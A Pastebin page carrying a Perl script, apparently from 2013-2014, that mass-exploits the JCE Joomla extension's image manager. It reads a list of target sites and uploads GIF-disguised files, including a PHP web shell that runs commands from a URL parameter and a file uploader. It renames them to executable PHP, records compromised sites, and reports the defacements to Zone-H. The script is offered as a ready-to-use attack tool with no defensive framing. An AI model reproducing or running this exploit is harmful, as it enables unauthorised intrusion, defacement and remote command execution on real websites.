API tools faq
paste
Advertisement
elzindyanii340

[perl] com_jce

elzindyanii340
Jul 6th, 2017
54
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 9.83 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #coded by el ZinDYanII-tN (2013-2014)
  3. #free toolZ
  4. use Socket;
  5. use IO::Socket;
  6. use IO::Socket::INET;
  7. use LWP::UserAgent;
  8. use Term::ANSIColor;
  9. use HTTP::Request::Common qw(POST);
  10. use HTTP::Request::Common qw(GET);
  11. $ag = LWP::UserAgent->new();
  12. $ag->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  13. $ag->timeout(10);
  14. system('cls');
  15. print "*******************************************************************************","\n";
  16. print "************************[ Coded By el ZinDYanII-tN ]***************************","\n";
  17. print "*******************************************************************************","\n";
  18.  
  19. $banner = ('
  20. ');
  21. print ("\n    .::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.2 .::.\n\n");
  22. print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";
  23.  
  24. print "    d88b  .o88b. d88888b      d88888b db    db  .o88b. db   dD d88888b d8888b. ","\n";
  25. print "    `8P' d8P  Y8 88'          88'     88    88 d8P  Y8 88 ,8P' 88'     88  `8D ","\n";
  26. print "     88  8P      88ooooo      88ooo   88    88 8P      88,8P   88ooooo 88oobY' ","\n";
  27. print "     88  8b      88~~~~~      88~~~   88    88 8b      88`8b   88~~~~~ 88`8b   ","\n";
  28. print " db. 88  Y8b  d8 88.          88      88b  d88 Y8b  d8 88 `88. 88.     88 `88. ","\n";
  29. print " Y8888P   `Y88P' Y88888P      YP      ~Y8888P'  `Y88P' YP   YD Y88888P 88   YD ","\n\n";
  30. print "                 |-> Facebook  :   www.facebook.com/XelzindyaniiX               ";                                                            
  31. print "     Contact me -|                               or                             ";                                                            
  32. print "                 |-> Email     :    elzindyanii340[@]gmail.com                  ";                                                            
  33. print "\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";                                                                              
  34.  
  35. if($0 =~ /^(.*)\\(.+)$/){chomp($a = $2);}else{chomp($a = $0);}
  36.  
  37. if(!defined($ARGV[0])) { print "\n How To Use => $a lista.txt ou $a -s www.site.com \n"; exit; }
  38.  
  39. $TXT = $ARGV[0]; if($TXT eq "-s"){@TXT = $ARGV[1]; $aq = $ARGV[1];
  40. if(!defined($ARGV[1])) { print "\n\nHow To Use => $a lista.txt ou $a -s www.site.com\n\n"; exit; }
  41. }else{open(TXT,"<$TXT"); chomp(@TXT=<TXT>); close(TXT); $aq = $ARGV[0];}
  42. $tx = $#TXT+1;
  43. print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.2 .::.\n\n";
  44.  
  45. $ok = '0'; $erro = '0';
  46. site: foreach(@TXT){ chomp(my $site = $_);
  47. $cm=''; $porra = '0';
  48. if($site =~ /http:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
  49. }elsif($site =~ /http:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
  50. }elsif($site =~ /https:\/\/(.*)\/(.*)\//){$site = $1; $cm = $2;
  51. }elsif($site =~ /https:\/\/(.*)\/(.*)/){$site = $1; $cm = $2;
  52. }elsif($site =~ /http:\/\/(.*)\//){$site = $1;
  53. }elsif($site =~ /http:\/\/(.*)/){$site = $1;
  54. }elsif($site =~ /https:\/\/(.*)\//){$site = $1;
  55. }elsif($site =~ /https:\/\/(.*)/){$site = $1;
  56. }elsif($site =~ /(.*)\/(.*)\//){$site = $1; $cm = $2;
  57. }elsif($site =~ /(.*)\/(.*)/){$site = $1; $cm = $2;
  58. }elsif($site =~ /(.*)\//){$site = $1;}
  59.  
  60. $http = 'http://'; $porta = "80";
  61.  
  62. $script = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20';
  63. $up = '/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b';
  64.  
  65. print "\n>> $site ->";
  66. $cs++;
  67. system "title $a $aq - [ $cs\/$tx ] =-= Zone-H [ OK ($ok) ~  ERRO ($erro) ]";
  68. ############################################### Packet 1 --> checking misses
  69. if($cm){ $script = '/'."$cm"."$script"; $up = '/'."$cm"."$up"; }
  70.  
  71. $pageURL= "$http"."$site"."$script";
  72. $getp = $ag->request(HTTP::Request->new(GET => $pageURL));
  73. $get = $getp->content;
  74. if($get !~ m/multipart\/form-data|hastip|\/plugins\/editors\/jce\//g){ print " [!]"; next site;}
  75.  
  76. my @index = (
  77. '../../xk.txt',
  78. '../../xh.txt',
  79. '../../ck.htm',
  80. '../../tmp/x.html',
  81. '../../cache/x.html',
  82. '../x.html',
  83. '../../tmp/ck.htm',
  84. '../../cache/ck.htm',
  85. '../ck.htm',
  86. '../xxx.php',
  87. '../xxu.php');
  88.  
  89. if($cm){push(@index,'../../../x.htm','../../../x.html','../../../x.php','../../../xk.txt','../../../xh.txt','../../../ck.htm');}
  90.  
  91. push(@index,'../../x.php','../../x.php');
  92.  
  93. foreach(@index){
  94. chomp(my $indx = $_);
  95. $porra++;
  96.  
  97. if($indx =~ /xk/){ $narq = 'arti'."$porra";
  98. $cont  = 'Invasão feita por Renatinho';}
  99.  
  100. if($indx =~ /xh/){ $narq = 'not'."$porra";
  101. $cont  = 'Invasão feita por Renatinho';}
  102.  
  103. if($indx =~ /configuration/){ $narq = 'clor'."$porra";
  104. $cont  = 'Invasão feita por Renatinho<?php exit;?>';}
  105.  
  106. if($indx =~ /index|ck/){ $narq = 'plas'."$porra";
  107. $cont  = 'Invasão feita por Renatinho';}
  108.  
  109. if($indx =~ /xxx/){ $narq = 'gligie'."$porra";
  110. $cont  = 'GIF89a
  111. <?php system("$_GET[cmd]"); exit; ?>';}
  112.  
  113. if($indx =~ /xxu/){ $narq = 'tir'."$porra";
  114. $cont  = 'GIF89a u
  115. <?php @copy($_FILES[file][tmp_name], $_FILES[file][name]); exit; ?>';}
  116.  
  117.  
  118. print "\n\n $indx - $narq \n$cont \n\n----------------------------------------------";
  119.  
  120.  
  121. ############################################### Packet 2 --> Leveling as a. Gif
  122. $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
  123. print $remote "POST $up HTTP/1.1"."\n";
  124. print $remote "Host: $site"."\n";
  125. print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
  126. print $remote "Content-Type: multipart/form-data; boundary=---------------------------41184676334"."\n";
  127. print $remote "Content-Length: 769"."\n\n";
  128. print $remote "-----------------------------41184676334"."\n";
  129. print $remote 'Content-Disposition: form-data; name="upload-dir"'."\n\n";
  130. print $remote '/'."\n";
  131. print $remote "-----------------------------41184676334"."\n";
  132. print $remote 'Content-Disposition: form-data; name="Filedata"; filename=""'."\n";
  133. print $remote 'Content-Type: application/octet-stream'."\n\n\n";
  134. print $remote "-----------------------------41184676334"."\n";
  135. print $remote 'Content-Disposition: form-data; name="upload-overwrite"'."\n\n";
  136. print $remote "0"."\n";
  137. print $remote "-----------------------------41184676334"."\n";
  138. print $remote 'Content-Disposition: form-data; name="Filedata"; filename="'.$narq.'.gif"'."\n";
  139. print $remote 'Content-Type: image/gif'."\n\n";
  140. print $remote "$cont"."\n";
  141. print $remote "-----------------------------41184676334"."\n";
  142. print $remote 'Content-Disposition: form-data; name="upload-name"'."\n\n";
  143. print $remote "$narq"."\n";
  144. print $remote "-----------------------------41184676334"."\n";
  145. print $remote 'Content-Disposition: form-data; name="action"'."\n\n";
  146. print $remote 'upload'."\n";
  147. print $remote "-----------------------------41184676334--"."\n\n";
  148. close($remote);
  149.  
  150. ############################################### Packet 3 --> Gif to Php
  151. $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site" ,PeerPort=>"$porta", Timeout=>"10") or " Erro!" and next site;
  152. $json = 'json={"fn":"folderRename","args":["'.$narq.'.gif","'.$indx.'"]}';
  153. print $remote "POST $script HTTP/1.1"."\n";
  154. print $remote "Host: $site"."\n";
  155. print $remote "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801"."\n";
  156. print $remote 'Content-Type: application/x-www-form-urlencoded; charset=utf-8'."\n";
  157. print $remote 'X-Request: JSON'."\n";
  158. print $remote "Content-Length: ".length($json).""."\n\n";
  159. print $remote "$json"."\n\n";
  160. while(<$remote>){print "$_";}
  161. close($remote);
  162. }
  163. ############################################### Packet 4 --> Checking resulta upload
  164. my @xxx=('/images/xxu.php','/images/xxx.php');
  165. if($cm){ push(@xxx,'/'."$cm".'/images/xxu.php','/'."$cm".'/images/xxx.php'); }
  166. foreach(@xxx){
  167. $shc = 'http://'."$site"."$_";
  168. my $resc=$ag->request(HTTP::Request->new(GET => $shc));
  169. $respc = $resc->content;
  170. if($respc =~ m/GIF89a/g){ open(SHU,">>SH.txt"); print SHU "$shc\n"; close(SHU); } }
  171.  
  172. my @indxs = ('/','/ck.htm','/xk.txt','/xh.txt','/tmp/','/cache/','/images/','/tmp/ck.htm','/cache/ck.htm','/images/ck.htm');
  173. if($cm){
  174. push(@indxs,'/'."$cm".'/','/'."$cm".'/ck.htm','/'."$cm".'/xk.txt','/'."$cm".'/xh.txt','/'."$cm".'/tmp/','/'."$cm".'/cache/','/'."$cm".'/images/','/'."$cm".'/tmp/ck.htm','/'."$cm".'/cache/ck.htm','/'."$cm".'/images/ck.htm')}
  175.  
  176. foreach(@indxs){ chomp(my $iind = $_);
  177.  
  178. $urst = 'http://'."$site"."$iind";
  179. my $res=$ag->request(HTTP::Request->new(GET => $urst));
  180. $resp = $res->content;
  181. if($resp =~ m/el ZinDYanII-tN/g){ $sthckd = "$site"."$iind";
  182. $sockz = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => "80", Proto => "tcp") or next;
  183. print $sockz "POST /notify/single HTTP/1.0\r\n";
  184. print $sockz "Accept: */*\r\n";
  185. print $sockz "Referer: http://www.zone-h.org/notify/single\r\n";
  186. print $sockz "Accept-Language: pt-br\r\n";
  187. print $sockz "Content-Type: application/x-www-form-urlencoded\r\n";
  188. print $sockz "Connection: Keep-Alive\r\n";
  189. print $sockz "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801\r\n";
  190. print $sockz "Host: www.zone-h.org\r\n";
  191. $length=length("defacer=el%20ZinDYanII-tN&domain1=http%3A%2F% 2F$sthckd&hackmode=17&reason=1");
  192. print $sockz "Content-Length: $length\r\n";
  193. print $sockz "Pragma: no-cache\r\n";
  194. print $sockz "\r\n";
  195. print $sockz "defacer=el%20ZinDYanII-tN&domain1=http%3A%2F%2F$sthckd&hackmode=17&reason=1\r\n";
  196. $zn = join('',<$sockz>);
  197. if($zn =~ m/ERROR:/g){print " [ Zone-H ] ".$http.$sthckd." [ ERRO ]"; $erro++;}else{print " [ Zone-H ] ".$http.$sthckd." [ OK ]"; $ok++;}
  198. close($sockz);
  199. open(HCKDS,">>HCKDS.txt"); print HCKDS "$http"."$sthckd\n"; close(HCKDS);
  200. $sthckd = ''; $hk++; next site;}
  201. } }
  202.  
  203. if(!$hk){$hk=0;}if(!$ok){$ok=0;}if(!$erro){$erro=0;}
  204. if($hk){
  205. print "\n\n [ Total Hacked -> $hk -#- Success sended Zone-h -> $ok -#- Error sended to Zone-h -> $erro ]\n\n";}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!